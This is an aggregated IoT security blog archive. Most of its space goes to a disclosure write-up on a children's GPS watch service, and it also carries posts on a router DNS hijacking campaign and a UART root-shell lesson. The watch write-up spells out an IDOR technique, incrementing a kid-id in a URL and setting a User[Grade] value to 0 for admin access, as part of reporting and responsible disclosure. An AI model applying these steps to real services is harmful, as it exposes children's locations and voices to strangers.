Category Archives: IoT

Microsoft acquires Express Logic, accelerating IoT development for billions of devices at scale

IoT sensors are being infused into just about everything, from industrial equipment to consumer devices, and increasingly these devices are connecting to the cloud. By 2020, Gartner predicts there will be more than 20 billion connected devices. In April 2018, we announced we’re investing $5 billion in IoT and the intelligent edge over the next four years. Since then, we’ve been making a number of investments from product innovation – including Azure Sphere, Azure Digital Twins, Azure IoT Edge, Azure Maps and Azure IoT Central – new partnerships with DJI, SAP, PTC, Qualcomm and Carnegie Mellon University for IoT and edge app development, and programs to help drive the next wave of innovation for our customers.

Express Logic logoToday, I am incredibly excited to share we have acquired Express Logic, a leader in real time operating systems (RTOS) for IoT and edge devices powered by microcontroller units (MCUs). Express Logic’s ThreadX RTOS has over 6.2 billion deployments, making it one of the most deployed RTOS in the world. This widespread popularity is driven by demand for technology to support resource constrained environments, especially those that require safety and security. Manufacturers building products across a range of categories – from low capacity sensors like lightbulbs and temperature gauges to air conditioners, medical devices, and network appliances – leverage the size, safety and security benefits of Express Logic solutions to achieve faster time to market. Even highly constrained devices (battery powered and having less than 64KB of flash memory) can use Express Logic solutions. Over 9 billion of these MCU-powered devices are built and deployed globally every year, many of which can benefit from Express Logic solutions.

With this acquisition, we will unlock access to billions of new connected endpoints, grow the number of devices that can seamlessly connect to Azure and enable new intelligent capabilities. Express Logic’s ThreadX RTOS joins Microsoft’s growing support for IoT devices and is complementary with Azure Sphere, our premier security offering in the microcontroller space. Our goal is to make Express Logic’s ThreadX RTOS available as an option for real time processing requirements on an Azure Sphere device and also enable ThreadX-powered devices to connect to Azure IoT Edge devices when the IoT solution calls for edge computing capabilities. While we recommend Azure Sphere for customers’ most secured connections to the cloud, where Azure Sphere isn’t possible in highly constrained devices, we recommend Express Logic’s ThreadX RTOS over other RTOS options in the industry because of its additional certifications and out-of-the-box connectivity to Azure IoT Hub.

As we’ve stated consistently in the past, our primary goal is to simplify IoT – from the cloud all the way down to the smallest MCU based devices. We do this by meeting our customers where they are with the right developer tools, software and intelligent cloud services to manage their solutions at scale. Express Logic’s technology and team will be an incredible addition to Microsoft in our quest to give every customer the ability to transform their businesses, and the world at large, with connected solutions.

Can Smart Lighting Beat a Hacker? How Machine Learning Can Boost IoT Security

It’s possible: Smart lighting could be the most dangerous element in your company’s network. By 2025, there will be 75 million IoT devices in use. Smart devices are now found throughout most commercial offices, yet a lack of security could make them ticking time bombs;...

The post Can Smart Lighting Beat a Hacker? How Machine Learning Can Boost IoT Security appeared first on Lastline.

The post Can Smart Lighting Beat a Hacker? How Machine Learning Can Boost IoT Security appeared first on Security Boulevard.

What Did We Learn from the Global GPS Collapse?

On April 6, 2019, a ten-bit counter rolled over. The counter, a component of many older satellites, marks the weeks since Jan 1, 1980. It rolled over once before, in the fall of 1999. That event was inconsequential because few complex systems relied on GPS. Now, more systems rely on accurate time and position data: automated container loading and unloading systems at ports, for example. The issue was not with the satellites or with the cranes.

The problem highlights the pervasive disconnect between the worlds of IT and OT. Satellites are a form of industrial control system. Engineers follow the same set of principles designing satellites as they do designing any other complex programmable machine. Safety first, service availability next.

In the 1990s satellites suffered a series of failures, prompting the US General Accounting Office (GAO) to review satellite security. The report (at https://www.gao.gov/products/GAO-02-781) identifies two classes of problems that might befall satellites, shown in these two figures.

Figure 1: Unintentional Threats to Satellites

Figure 2: Intentional Threats to Satellites

This analysis is incomplete. It omits an entire class of problems: software design defects and code bugs. The decision to use a 10-bit counter to track the passing weeks is a design defect. The useful life of a satellite can be 40 years or more. A 10-bit counter runs from 0 to 1,023, then rolls over to zero. Since the are 52 weeks in a year, the counter does not quite make it to 20 years. This design specification was dramatically under-sized. More recent designs use a 13-bit counter, which will not roll over for almost 160 years. That provides an adequate margin.

As for code bugs, satellites suffer them just like any other programmable system. The Socrates network tracks satellites to project potential collisions. In 2009, Socrates predicted that two satellites, a defunct Soviet-era communications satellite and the Iridium constellation satellite #33, were projected to pass 564 meters apart. In reality, they collided, creating over 2,000 pieces of debris larger than 1 cm in size. Whether the defect arose from buggy code or inadequate precision in observations, the satellites collided. Either way, there is a software defect here. The question is, is the software inaccurate, or is it creating precision that does not exist? If the instruments doing the measurement have a margin of error, the report should include that data. By stating that the satellites will pass 564 meters apart, the value implies a precision of ½ meter either way – between 563.5 meters and 564.5 meters. If the precision is within half a kilometer, the software should state that specifically – “Possible collision – distance between objects under 1 KM.” If the input data is precise, then the code is calculating the trajectories incorrectly. Either is a code bug.

These two types of defects are neither unintentional (code and designs do not degrade over time) nor intentional (no saboteur planted the defect). The third class of defect results from inconsistent design specifications (the satellite can live for 40 years but the counter rolls over in 20) or poor coding practices (creating a level of precision unsupported by the measurements, or calculating the trajectories incorrectly). These are software defects.

As we all know, there was no failure in the GPS system. I made a passing comment during a talk on satellite security at the RSA 2019 conference. A reporter from Tom’s Guide was there, and he wrote an excellent article on the problem: https://www.tomsguide.com/us/gps-mini-y2k-rsa2019,news-29583.html.

The failure is not including software issues among the risks to a programmable device.

What do you think? Let me know below or @WilliamMalikTM.

The post What Did We Learn from the Global GPS Collapse? appeared first on .

Radware Blog: Bot Managers Are a Cash-Back Program For Your Company

In my previous blog, I briefly discussed what bot managers are and why they are needed. Today, we will conduct a short ROI exercise (perhaps the toughest task in information security!). To recap: Bots generate a little over half of today’s internet traffic. Roughly half of that half (i.e. a quarter, for rusty ones like […]

The post Bot Managers Are a Cash-Back Program For Your Company appeared first on Radware Blog.



Radware Blog

How to Track Your Kids (and Other People’s Kids) With the TicTocTrack Watch

Presently sponsored by: Twilio: Learn about why building your own 2FA solution is risky and expensive. Use our Authy API to add 2FA to your app in a matter of days.

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Do you ever hear those stories from your parents along the lines of "when I was young..." and then there's a tale of how risky life was back then compared to today. You know, stuff like having to walk themselves to school without adult supervision, crazy stuff like that which we somehow seem to worry much more about today than what we did then. Never mind that far less kids go missing today than 20 years ago and there's much less chance of them being hit by a car, circumstances are such today that parents are more paranoid than ever.

The solution? Track your kids' movements, which brings us to TicTocTrack and the best way to understand their value proposition is via this news piece from a few years ago:

Irrespective of what I now know about the product and what you're about to read here, this sets off alarm bells for me. I've been involved with a bunch of really poorly implemented "Internet of Things" things in the past that presented serious privacy risks to those who used them. For example, there was VTech back in 2015 who leaked millions of kids' info after they registered with "smart" tablets. Then there was CloudPets leaking kids voices because the "smart" teddy bears that recorded them (yep, that's right) then stored those recordings in a publicly facing database with no password. Not to mention the various spyware apps often installed on kids' phones to track them which then subsequently leak their data all over the internet. mSpy leaked data. SpyFone leaked data.  Mobiispy leaked data. And that's just a small slice of them.

And then there's kids' smart watches themselves. A couple of years back, the Norwegian Consumer Council discovered a whole raft of security flaws in a number of them which covered products from Gator, GPS for barn and Xplora:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

These flaws included the ability for "a stranger [to] take control of the watch and track, eavesdrop on and communicate with the child" and "make it look like the child is somewhere it is not". These issues (among others), led the council's Director of Digital Policy to conclude that:

These watches have no place on a shop’s shelf, let alone on a child’s wrist.

Referencing that report, US Consumer groups drew a similar conclusion:

US consumer groups are now warning parents not to buy the devices

The manufacturers fixed the identified flaws... kind of. Two months later, critical security flaws still remained in some of the watches tested, the most egregious of which was with Gator's product:

Adding to the severity of the issues, Gator Norge gave the customers of the Gator2 watches a new Gator3 watch as compensation. The Gator3 watch turned out to have even more serious security flaws, storing parents and kids’ voice messages on an openly available webserver.

Around a similar time, Germany outright banned this class of watch. The by-line in that piece says it all:

German parents are being told to destroy smartwatches they have bought for their children after the country's telecoms regulator put a blanket ban in place to prevent sale of the devices, amid growing privacy concerns.

Wow - destroy them! The story goes on to refer to the German Federal Network Agency's rationale which includes the fact that "parents can use such children’s watches to listen unnoticed to the child’s environment". This is a really important "feature" to understand: these devices aren't just about tracking the kids whereabouts, they're also designed to listen to their surroundings... including their voices. Now on the one hand you might say "well, parents have a right to do that". Maybe so, maybe not, you'll hear vehement arguments on that both ways. But what if a stranger had that ability - how would you feel about that? We'll come back to that later.

Around a year later, Pen Test Partners in the UK found more security bugs. Really bad ones:

Guess what: a train wreck. Anyone could access the entire database, including real time child location, name, parents details etc.

This wasn't just bad in terms of the nature of the exposed data, it was also bad in terms of the ease with which it was accessed:

User[Grade] stands out in there. I changed the value to 2 and nothing happened, BUT change it to 0 and you get platform admin.

So change a number in the request and you become God. This is something which is easily discovered in minutes either by a legitimate tester within the organisation building the software (which obviously didn't happen) or... by someone with malicious intent. The Pen Test Partners piece concludes:

We keep seeing issues on cheap Chinese GPS watches, ranging from simple Insecure Direct Object Request (IDOR), to this even simpler full platform take over with a simple request parameter change.

Keep that exploit in mind - insecure direct object references are as simple as taking a URL like this:

example.com/get-kids-location?kid-id=27

And changing it to this:

example.com/get-kids-location?kid-id=28

The level of sophistication required to exploit an IDOR vulnerability boils down to being able to count. That was in January this year, fast forward a few months and Ken Munro from Pen Test Partners contacts me. He's found more serious vulnerabilities with the services these devices use and in particular, with TicTocTrack's product. He believes the same insecure direct object reference issues are plaguing the Aussie service and they needs someone on the ground here to help establish the legitimacy of the findings.

To test Pen Test Partners' theory, I decided to play your typical parent in terms of the buying and setup process and use my 6-year old daughter, Elle, as the typical child. She's smack bang in the demographic of who the watch is designed for and I was happy to give Ken access to her movements for the purposes of his research. So it's off to tictoctrack.com.au where the site leans on its Aussie origins:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

I can understand why companies emphasise the "we host your data near you" mantra, but in practical terms it makes no difference whether it's in Australia or, say, the US. You're also often talking about services that are written and / or managed by offshore companies anyway so where the data physically sits really is inconsequential (note: this is assuming no regulatory obligations around co-locating data in the country of origin). The "we take the security of your data seriously" bit, however, always worries me and as you'll see shortly, that concern is warranted.

The Aussie angle comes up again further down the page too:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

At this point it's probably worthwhile pointing out that despite the Aussieness asserted on the front page, the origin of the watch isn't exactly very Australian. In fact, the watch should be rather familiar by now:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

So for all the talk of TicTocTrack, the hardware itself is actually Gator. In fact, you can see exactly the same devices over on the Gator website:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

It's not clear how they arrived at the conclusion of "the world's most reputable GPS watch for kids and elders", especially given the earlier findings. And who is Gator? They're a Chinese company located in Shenzhen:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

The country of origin would be largely inconsequential were it not for TicTocTrack's insistence on playing the Aussie card earlier on. It's also relevant in light of the embedded media piece at the start of this blog post: this isn't "a new device developed by a Brisbane mother" nor is the mother "the creator of the watch". In fairness to Karen Cantwell, it wasn't her making those claims in the story and the media does have a way of spinning things, but it's important to be clear about this given how this story unfolds from here.

Regardless, let's proceed and actually buy the thing. I get Elle involved and allow her to choose the colour, with rather predictable results:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

The terms and conditions were actually pretty light (kudos for that!) but the link to the privacy and security policies was dead. I go through the checkout process and buy the watch:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

iStaySafe Pty Ltd is the parent company and we'll see that name pop up again later on. An email promptly arrives with a receipt and a notice about the order being processed, albeit without a delivery time frame mentioned. With time to kill, I decide to poke around and take a look at how the tracking works, starting with the link below:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Turns out the tracking app is a totally different website running on a totally different hosting provider in a totally different state:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

The primary site is down in Melbourne whilst the tracking site is in Brisbane per the info on the front page. My credentials from the primary site don't work there and registering results in me needing to choose a reseller:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Here we see iStaySafe again, but it's the other resellers (all Aussie companies) that help put the whole Gator situation in context. Uniting Agewell provides services to the elderly and when considering the nature of the Gator watch, it made me think back to a comment on the Chinese manufacturer's website: "the world's most reputable GPS watch for kids and elders". Cellnet is a publicly listed company with a heap of different brands. Wearco produces "mining consumables". eHomeCare provides "smart care technology for healthy ageing" and their product page on the GPS tracking watch explains the relationship:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

As it turns out, attempting to sign up just boots me back to the TicTocTrack website so I assume I just need to wait for the watch to arrive before going any further. Still, this has been a useful exercise to understand not just how the various entities relate to each other, but also because it shows that the scope of this issue isn't just constrained to kids, it affects the elderly too.

A few days later, this lands in the mail:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch
How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

I'm surprised by how chunky it is - this is a big unit! For context, here it is next to my series 4 Apple Watch (44mm - the big one):

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

I'm not exactly expecting Apple build quality here (and as you can see from the pic, it's a long way from that), but this is a lot to put on a little kid's wrist. You can see the access port for the physical SIM card (more on that later), as opposed to Apple's eSIM implementation so it's obviously going to consume a bunch of space when you're building a physical caddy into the design to hold a chip on a card.

Regardless, let's get on with the setup process and I'm going to be your average everyday parent and just follow the instructions:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

The app is branded TicTocTrack and is published by iStaySafe:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Popping it open, the first step is registration (the mobile number is a pre-filled placeholder):

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

I'm surprised by the empty space at the top and the bottom - just which generation of iPhone was this designed for? Certainly not the current gen XS, does that resolution put it back in about the iPhone 5 era from 2012? That'd be iOS 6 days which their user manual seems to suggest:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Whilst the aesthetics of the app might seem inconsequential, I've always found that it's a good indicator of overall quality and is often accompanied by shortcomings of a more serious nature. It's the little things that keep popping up, for example the language and grammar in the aforementioned user manual. Why is it "Support Platforms" and then "Supported devices"? And why is the opening sentence of the doc so... odd?

Welcome to TicTocTrack® User Manual! You are about to begin your journey with the live tracking with your family.

That sort of language appears every now and then, for example in the password reset section:

If you forget your password, please use web portal to obtain new password.

It has me wondering how much of this was outsourced overseas and again, that wouldn't normally be worth mentioning were it not for the emphasis placed on the Aussie origins of the service (I know, despite it being a Chinese watch). The actual origins of the service become clear once you look at the download links for the app:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Searching for that same "Nibaya" name on the TicTocTrack website turns up several different versions of the user manual:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

It turns out that Nibaya is a Sri Lankan software development company with a focus on quality control and quality assurance:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

We're also told by the browser that they're "Not secure" which is not a great look in this day and age. They do in fact have a certificate on the site, only thing is it expired two and a half years ago and they haven't bothered to renew it:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Moving on, there's a mobile phone number verification process which sends an SMS to my device:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Only thing is, the keyboard defaults back to purely alphabetical after every character is typed so unless you pre-fill the field from the SMS (which iOS natively allows you to do), it's a bit painful. Again, it's all the little things.

Following successful number verification, the app fires app and asks for access to location data:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Based on what I'd already read in the user manual, my location data can be used to direct me to a child wearing the watch so requesting this seems fine for that feature to function correctly.

Next is the money side of things and we're looking at $20 a month for the "Full Service Subscription":

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

If I'm honest, I'm still a bit confused about what this entails. Is this for the tracking service? Or for the Telstra SIM which it shipped with and is identically priced?

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Or is it for both? I'm assuming both but then when I look at the service plans on the website, none of them are priced at $19.99. Regardless, I take the $20 option and move on:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

The adding a device bit I get - I'm going to need to pair the watch - but the subscription bit further confuses me because I've literally just bought a subscription on the previous screen! For my purposes I don't see myself needing it for any more than 7 days anyway so I'm not too concerned, let's go and add that new device:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

A new TicTocTrack watch it is:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

And let's go with the supplied SIM which then leads us to the device and SIM registration page:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

The IMEI is the identifier of the device itself (the watch) and that can be scanned off the barcode in the packaging. The SIM ID relates to the pre-packaged SIM from Telstra, the barcode for which is under one of the grey obfuscation boxes in the earlier image. I call the device "Elle", register it and that's that.

Lastly, I insert the SIM into the watch (the metal flap for which opens in the opposite direction to the video tutorial and took me a good 5 minutes to work out for fear of breaking it), then drop it onto the power. Give it a couple of hours to charge, boot it up and shortly afterwards it's showing a 3G connection:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

I give it a little time to sync to the TicTocTrack service then successfully find it in the app:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Drilling down on Elle's profile, I get an address and GPS coordinates which are both pretty accurate:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

To its credit, the watch does a pretty good job of the setup and tracking process once you're past some of the earlier hurdles. At this stage, I now have a device which is broadcasting its location reliably and I can successfully see it in the app. I'm not going to go through other features such as the ability to send an SOS or make a call, at this stage all I really care about is that the watch is now tracking her movements.

The next day, we head off to tennis camp (it's school holiday time) with the TicTocTrack / Gator on her wrist:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

She isn't aware of why she has the watch, to her it's just a new cool thing she gets to wear. And it's pink so that's all boxes ticked. She's now at the local court whilst I (in my helicopter parent mode), am sitting at home watching her location on my device:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Safe in the knowledge that my little girl is in a place that I trust, I get back to work. But someone else is also watching her location, someone on the other side of the world who is now able to track her every move - it's Ken. Not only is Ken watching, as far as TicTocTrack is concerned he's just taken her away:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

She's no longer playing tennis, she's now in the water somewhere off Wavebreak island. This isn't a GPS glitch; Ken has placed her four and a half kilometres away by exploiting an insecure direct object reference vulnerability in TicTocTrack's API. He's done this with my consent and only to my child, but you can see how this could easily be abused. It's not just the concept of making someone's child appear in a different location to what the parents expect, you could also have them appear exactly where the parents expect... when they're actually nowhere near there.

But these devices are about much more than just location tracking, they also enable 2-way voice communications just as you'd have on a more traditional cellular phone. This, in turn, introduces a far creepier risk - that unknown parties may be able to talk to your kids. In order to demonstrate this, I put the watch back on Elle and gave Pen Test Partners permission to contact her. Pay attention to how much interaction is required on her part in order for a stranger to begin talking to her simply by exploiting a vulnerability in the TicTocTrack service:

Even for me, that video is creepy. It required zero interaction because Vangelis was able to add himself as a parent and a parent can call the device and have it automatically answer without interaction by the child. The watch actually says "Dad" next to a little image of a male avatar so a kid would think it was their father calling them:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

This is precisely what the Germans were worried about when they banned the watches outright and when you watch that video, it seems like a pretty good move on their part.

The exploits go well beyond what I've already covered here too, for example:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

That link goes off to a Facebook post by an account called Travelling with Kids which very enthusiastically espouses the virtues of tracking them (it's not explicitly said, but the post appears to be promotional in nature):

The little wanderers were stoked to be going off to kids club at the Hard Rock Hotel Bali We have complete peace of mind knowing they’re wearing their TicTocTrack watches, so they can call us at anytime and with GeoFencing we know their location

By now, I'm sure you can see the irony in the "peace of mind" statement.

The technical flaws go much further than this but rather than covering them here, have a read of the Pen Test Partners write-up which includes details of the IDOR vulnerability. Just to put it in layman's terms, here's the discussion I had with Vangelis about it:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

Being conscious that many people who don't normally travel in information security circles will read this, handling a vulnerability of this nature in a responsible fashion is enormously important. Obviously you want to remove the risk ASAP, but you also want to make sure that information about how to exploit it isn't made public beforehand. We religiously followed established best practices for responsible disclosure, here's the timeline with dates being local Aussie ones for me:

  1. Saturday 6 April: Ken first contacts me about the watch. I order one that morning.
  2. Tuesday 9 April: Watch arrives.
  3. Wednesday 10 April: I set the account up.
  4. Thursday 11 April: Elle wears the watch to tennis and we test "relocating" her.
  5. Friday 12 April: Vangelis calls her and has the discussion in the video above. Ken privately discloses the vulnerability to TicTocTrack support that night.
  6. Monday 15 April (today): TicTocTrack takes the service offline.

A couple of hours before publishing, I received a notification to the email address I signed up with as follows:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

I'm in 2 minds about this message: on the one hand, they took the service down as fast as we could reasonably expect, being within a single business day so kudos to them on that. On the other hand, the messaging worries me in a number of ways:

Firstly, Ken didn't just "allege" that there were security flaws, he spelled it out. His precise wording was "The service fails to correctly verify that a user is authorised to access data, meaning that anyone can access any data, should they so wish". Anyone testing for a flaw of this nature would very quickly establish that changing a number in the request would hand over control of someone else's account thus proving the vulnerability beyond any shadow of a doubt. That word was used 3 times in the statement and it implies that they're unsubstantiated claims; they're clearly not. Which brings me to the next point:

Secondly, it wouldn't make sense to pull down the entire service if you weren't convinced there was a serious vulnerability. Many people allege there are security flaws in services but they don't generally go offline until they're proven. Clearly an incident like this has a bunch of downstream impact and acknowledging it publicly is not something you do on a whim. Either TicTocTrack was very confident in that accuracy of Ken's report (well beyond what "alleged" implies) or there were other factors I'm not aware of that drove them to rapidly pull the service.

Thirdly, the following statement was made without citing any evidence: "there has never been a security breach that has lead to our customer's personal data being used for malicious purposes". It's not uncommon to see a response like this following a security incident, but what it should read is "we don't know if there's ever been a security breach..." This vulnerability relied on an authenticated user with a legitimate account modifying a number in the request and the likelihood of that being logged in a fashion sufficient enough to establish it ever happened is extremely low. And if you were the kind of developers to log this sort of information, you'd also be the kind not to have the vulnerability in the first place!

Let's be perfectly clear - this is just one more incident in a series of similar ones impacting kids tracking watches and Gator in particular. What's infuriating about this situation is that not only do these egregiously obvious security flaws keep occurring, they're just not being taken seriously enough by the manufacturers and distributors when they do occur. There's no finer illustration of this than the statement Ken got when speaking to an agent over in his corner of the world:

UK agent for Gator said that they didn’t have the money for security, as otherwise they couldn’t afford a staff Xmas party

Is that really where we're at? Tossing up between exposing our kids in this fashion and beers at Christmas? If you're a parent ever considering buying one of these for your kid, just remember that quote. Inevitably, cost would have also been a major driver for TicTocTrack outsourcing their development to Sri Lanka, indeed it's something that Nabaya prides itself on:

How to Track Your Kids (and Other People's Kids) With the TicTocTrack Watch

I want to finish on a broader note than just TicTocTrack or Gator or even smart watches in general; a huge number of both the devices and services I see being marketed either directly at kids or at parents to monitor their kids are absolute garbage in terms of the effort invested in security and privacy. I mentioned CloudPets and VTech earlier on and I also mentioned spyware apps; by design, every one of these has access to data that most parents would consider very personal and, in many cases, (such as the photos older kids are often taking), very sensitive. These products are simply not designed with a security-orientated mindset and the development is often outsourced to cheap markets that build software on a shoestring. The sorts of flaws we're seeing perfectly illustrate that: CloudPets simply didn't have a password on their database and both the VTech and TicTocTrack vulnerabilities were as easy as just incrementing a number in a web request. A bunch of the spyware breaches I referred to occurred because the developers literally published all the collected data to the internet for the world to see. How much testing do you think actually went on in these cases? Did nobody even just try adding 1 to a number in the request? Because that's all Ken needed to do; Ken can count therefore Ken can hack a device tracking children. Maybe I should give Elle a go at that, her counting is coming along quite nicely...

There's only one way I'd track my kids with GPS and cellular and that's with an Apple Watch. I don't mean to make that sound trivial either because we're talking about a $549 outlay here which is a hell of a lot to spend on a kid's watch (plus you still need a companion iPhone), but Apple is the sort of organisation that not only puts privacy first, but makes sure they actually pay attention to their security posture too. As that Gator agent in the UK well knows, security costs money and if you want that as a consumer, you're going to need to pay for it.

I'll leave you with this thread I wrote up when first starting to look at the watch. It got a lot of traction and I'd like to encourage you to share it with your parenting friends on Twitter or via the one I also posted to Facebook.

Vulnerabilities in smart IP cameras expose users to privacy, security risks

Bitdefender has found new vulnerabilities in IoT cameras that are meant to be protecting people’s homes. The global smart camera market is predicted to grow at a CAGR of 8

The post Vulnerabilities in smart IP cameras expose users to privacy, security risks appeared first on The Cyber Security Place.

4 ways to minimize IoT cybersecurity risk

Few technology trends are growing as quickly as the internet of things. According to Bain & Company, the markets for IoT hardware, software, systems integration, data and telecom services will grow

The post 4 ways to minimize IoT cybersecurity risk appeared first on The Cyber Security Place.

The Ethical Hacker Network: Hardware Hacking 101 – Lesson 3: Abusing UART (U Are RooT)

Hardware Hacking 101 - Lesson 3: Abusing UART (U Are RooT)As a reminder, Lesson 1 was a primer on electronics and setting up your lab, and Lesson 2 was an introduction to classical hardware hacking. To get started with security-focused hardware hacking, let's look at a pretty simple example: getting a root shell by breaking into U-Boot via a serial console. Basically, we're just going to connect to a serial port, change a boot flag, and get a shell. Sounds simple, right? To some extent, it is! The only real hard parts are finding the serial port, determining the pinout, and determining the timing. No problem, right? By the end of this lesson, you’ll be abusing UART with the best of them.

The unassuming target of this lesson is a Synology RT2600ac wireless router. This is one of the devices that the ISE Labs team assessed as part of our SOHO 2.0 project, but we had a bit of a problem. We had used the device but failed to record the credentials. And the reset button? Broken. This is where getting a hardware shell came in handy. By using a UART to get a shell, I was able to reset the password and get the assessment back on track. Hardware shells allow you to do so much more though, both in the context of repair and in the context of security. It’s a root shell, you can usually do whatever you like.

The post Hardware Hacking 101 – Lesson 3: Abusing UART (U Are RooT) appeared first on The Ethical Hacker Network.



The Ethical Hacker Network

What’s in Your IoT Cybersecurity Kit?

Did you know the average internet-enabled household contains more than ten connected devices? With IoT devices proliferating almost every aspect of our everyday lives, it’s no wonder IoT-based attacks are becoming smarter and more widespread than ever before. From DDoS to home network exposures, it appears cybercriminals have set their sights on the digital dependence inside the smart home — and users must be prepared.

A smart home in today’s world is no longer a wave of the future, but rather just a sign of the times we live in. You would be hard pressed to find a home that didn’t contain some form of smart device. From digital assistants to smart plugs, with more endpoints comes more avenues bad actors can use to access home networks. As recently as 2018, users saw virtual assistants, smart TVs, and even smart plugs appear secure, but under the surface have security flaws that could facilitate home network exposures by bad actors in the future. Whereas some IoT devices were actually used to conduct botnet attacks, like an IoT thermometer and home Wi-Fi routers.

While federal agencies, like the FBI, and IoT device manufacturers are stepping up to do their part to combat IoT-based cyberattacks, there are still precautions users should take to ensure their smart home and family remain secure. Consider this your IoT cybersecurity kit to keep unwelcome visitors out of your home network.

  • When purchasing an IoT device, make security priority #1. Before your next purchase, conduct due diligence. Prioritize devices that have been on the market for an extended period of time, have a trusted name brand, and/or have a lot of online reviews. By following this vetting protocol, the chances are that the device’s security standards will be higher.
  • Keep your software up-to-date on all devices. To protect against potential vulnerabilities, manufacturers release software updates often. Set your device to auto-update, if possible, so you always have the latest software. This includes the apps you use to control the device.
  • Change factory settings immediately. Once you bring a new device into your home, change the default password to something difficult to guess. Cybercriminals often can find the default settings online and can use them to access your devices. If the device has advanced capabilities, use them.
  • Secure your home network. It’s important to think about security as integrated, not disconnected. Not all IoT devices stay in the home. Many are mobile but reconnect to home networks once they are back in the vicinity of the router. Protect your network of connected devices no matter where they go. Consider investing in advanced internet router that has built-in protection that can secure and monitor any device that connects to your home network.
  • Use comprehensive security software. Vulnerabilities and threats emerge and evolve every day. Protect your network of connected devices no matter where you are with a tool like McAfee Total Protection.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post What’s in Your IoT Cybersecurity Kit? appeared first on McAfee Blogs.

DNS hijacking campaigns target Gmail, Netflix, and PayPal users

Security experts at Bad Packets uncovered a DNS hijacking campaign that is targeting the users of popular online services, including Gmail, Netflix, and PayPal.

Experts at Bad Packets uncovered a DNS hijacking campaign that has been ongoing for the past three months, attackers are targeting the users of popular online services, including Gmail, Netflix, and PayPal.

Hackers compromised consumer routers and modified the DNS settings to redirect users to fake websites designed to trick victims into providing their login credentials.

Bad Packets experts have identified four rogue DNS servers being used by attackers to hijack user traffic.

“Over the last three months, our honeypots have detected DNS hijacking attacks targeting various types of consumer routers.” reads the report published by Bad Packets. “All exploit attempts have originated from hosts on the network of Google Cloud Platform (AS15169). In this campaign, we’ve identified four distinct rogue DNS servers being used to redirect web traffic for malicious purposes.”

Experts pointed out that all exploit attempts have originated from hosts on the network of Google Cloud Platform (AS15169).

The first wave of DNS hijacking attacks targeted D-Link DSL modems, including D-Link DSL-2640B, DSL-2740R, DSL-2780B, and DSL-526B. The DNS server used in this attack was hosted by OVH Canada (66[.]70.173.48).

The second wave of attacks targeted the same D-Link modems, but attackers used a different rogue DNS server (144[.]217.191.145) hosted by OVH Canada.

DNS hijacking compromised_d-link

“As Twitter user “parseword” noted, the majority of the DNS requests were being redirected to two IPs allocated to a crime-friendly hosting provider (AS206349) and another pointing to a service that monetizes parked domain names (AS395082).” continues the experts.

The third wave of attacks observed in March hit a larger number of router models, including ARG-W4 ADSL routers, DSLink 260E routers, Secutech routers, and TOTOLINK routers.

The fourth DNS hijacking attacks originated from three distinct Google Cloud Platform hosts and involved two rogue DNS servers hosted in Russia by Inoventica Services (195[.]128.126.165 and 195[.]128.124.131).

In all the DNS hijacking attacks the operators performed an initial recon scan using Masscan. Attackers check for active hosts on port 81/TCP before launching the DNS hijacking exploits.

The campaigns aim at users Gmail, PayPal, Netflix, Uber, attackers also hit several Brazilian banks. , says

Experts found over 16,500 vulnerable routers potentially exposed to this DNS hijacking campaign.

“Establishing a definitive total of vulnerable devices would require us to employ the same tactics used by the threat actors in this campaign. Obviously this won’t be done, however we can catalog how many are exposing at least one service to the public internet via data provided by BinaryEdge” continues Bad Packets.

Experts explained that attackers abused Google’s Cloud platform for these attacks because it is easy for everyone with a Google account to access a “Google Cloud Shell.” This service offers users the equivalent of a Linux VPS with root privileges directly in a web browser.

Further technical details, including IoCs, are reported in the analysis published by Bad Packets:

https://badpackets.net/ongoing-dns-hijacking-campaign-targeting-consumer-routers/

Pierluigi Paganini

(SecurityAffairs – DNS hijacking, hacking)

The post DNS hijacking campaigns target Gmail, Netflix, and PayPal users appeared first on Security Affairs.

